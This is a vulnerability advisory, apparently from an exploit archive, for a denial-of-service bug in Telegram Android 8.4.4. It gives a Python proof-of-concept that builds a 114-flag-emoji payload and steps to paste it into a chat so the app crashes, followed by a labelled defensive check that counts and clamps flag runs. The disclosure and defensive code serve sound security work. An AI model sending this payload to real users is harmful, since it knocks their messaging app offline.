
Telegram Android 8.4.4 Denial Of Service

Posted Feb 17, 2022
Authored by h4shur

Telegram Android version 8.4.4 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 083ec8c45a13fbe3a9590af6885488cf1b4b2dfec672ef5829c35237ac92906a

Document Title:
===============
Telegram Android v8.4.4 - Denial of Service (PoC)


References (Source):
====================
https://twitter.com/h4shur


Release Date:
=============
2022-01-30


Common Vulnerability Scoring System:
====================================
7.8


Product & Service Introduction:
===============================
Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)
service. The service also provides end-to-end encrypted video calling,
VoIP, file sharing and several other features. It was launched for iOS on
14 August 2013 and Android in October 2013. The servers of Telegram are
distributed worldwide to decrease frequent data load with five data centers
in different regions, while the operational center is based in Dubai in the
United Arab Emirates. Various client apps are available for desktop and
mobile platforms including official apps for Android, iOS, Windows, macOS
and Linux (although registration requires an iOS or Android device and a
working phone number). There are also two official Telegram web twin apps –
WebK and WebZ – and numerous unofficial clients that make use of Telegram's
protocol. All of Telegram's official components are open source, with the
exception of the server, which is closed-source and proprietary.

Telegram provides end-to-end encrypted voice and video calls and optional
end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted
between the app and the server, so that ISPs and other third parties on the
network can't access data, but the Telegram server can. Users can send text
and voice messages, make voice and video calls, and share an unlimited
number of images, documents (2 GB per file), user locations, animated
stickers, contacts, and audio files. In January 2021, Telegram surpassed
500 million monthly active users. It was the most downloaded app worldwide
in January 2021 with 1 billion downloads globally as of late August 2021.


Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered Android application
vulnerabilities in the Telegram application.


Affected Product(s):
====================
Vendor: telegram.org / telegram.me / t.me
Product: Android Telegram application (Android-Application)
https://telegram.org/android


Vulnerability Disclosure Timeline:
==================================
2022-01-30: Researcher Notification & Coordination (Security Researcher)
2022-01-30: Public Disclosure


Discovery Status:
=================
Published


Exploitation Technique:
=======================
local


Severity Level:
===============
medium


Disclosure Type:
================
Full Disclosure


Technical specifications and description:
=========================================
1.1
In version 8.4.4 of the Telegram application for Android, a denial of
service vulnerability was discovered by H4shur. The vulnerability is in
the messenger's handling of emojis.

1.2
If you send a number of flag emojis with any text on the chat page,
tapping that message stops the program altogether, so that it no longer
provides service.


Proof of Concept (PoC):
=======================
1.1
A Denial of Service (DoS) attack is a type of cyberattack in which a
malicious person aims to make the resources of a system unavailable to
its users.
If the attack succeeds, the result is a slowdown or disabling of the
equipment and resources available to the victim.
To demonstrate or reproduce the vulnerability, follow the information
and steps provided below.


PoC: Exploitation
1.1
Run the Python script; it will create a new file "outputbufferh4shur.txt".
1.2
Run Telegram Android and go to "Saved Messages" or any chat page.
1.3
Copy the content of the file "outputbufferh4shur.txt".
1.4
Paste the content of outputbufferh4shur.txt into the "Write a message..."
field, then add any text to the message.
1.5
Oops...
Telegram Crashed <3


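script:
# Builds the test message from the steps above: 114 flag emojis in a text file.
bufferh4shur = "🇮🇷" * 114
try:
    # UTF-8 is set explicitly so the emoji can be written on any platform.
    with open("outputbufferh4shur.txt", "w", encoding="utf-8") as f:
        # Report the encoded size, since the message says "bytes".
        print("[!] Creating %s bytes DOS payload...." % len(bufferh4shur.encode("utf-8")))
        f.write(bufferh4shur)
    print("[!] File Created!")
except OSError:
    print("File cannot be created!")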



Security Risk:
==============
1.1
A Denial of Service (DoS) attack is a type of cyberattack in which a
malicious person aims to make the resources of a system unavailable to
its users.
If the attack succeeds, the result is a slowdown or disabling of the
equipment and resources available to the victim.
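
Added example, not part of the original advisory and not Telegram code: a
defensive check that a bot, gateway or client wrapper could run on incoming
message text to count flag emojis (pairs of regional indicator symbols) and
clamp long runs before the text is rendered. The limit of 50 flags and all
function names are assumptions; the advisory does not state a minimum count.

```python
import re

# Regional indicator symbols (U+1F1E6..U+1F1FF); one flag emoji is a pair of them.
_RI_RUN = re.compile("[\U0001F1E6-\U0001F1FF]+")

# Assumed limit, not a value from the advisory (its PoC uses 114 flags).
MAX_FLAGS = 50


def flag_stats(text):
    """Return (total flags, longest unbroken run of flags) for a message."""
    runs = [len(m.group()) // 2 for m in _RI_RUN.finditer(text)]
    return sum(runs), max(runs, default=0)


def is_suspicious(text, max_flags=MAX_FLAGS):
    """True when the message carries more flag emojis than the limit allows."""
    total, _ = flag_stats(text)
    return total > max_flags


def clamp_flag_runs(text, max_flags=MAX_FLAGS):
    """Cut every unbroken run of flags down to max_flags; other text is untouched."""
    return _RI_RUN.sub(lambda m: m.group()[: max_flags * 2], text)


if __name__ == "__main__":
    flag = "\U0001F1FA\U0001F1F3"  # constructed sample flag (two regional indicators)
    samples = {
        "normal": "meeting at 10 " + flag,
        "long run": flag * 114 + " any text",
        "spaced": (flag + " ") * 60,
    }
    for name, msg in samples.items():
        total, longest = flag_stats(msg)
        print(name, total, longest, is_suspicious(msg), len(clamp_flag_runs(msg)))
```

Clamping works per run, so a message that exceeds the limit with flags
separated by other characters is left unchanged by clamp_flag_runs but is
still reported by is_suspicious.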


Credits & Authors:
==================
h4shur
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur
h4shursec@gmail.com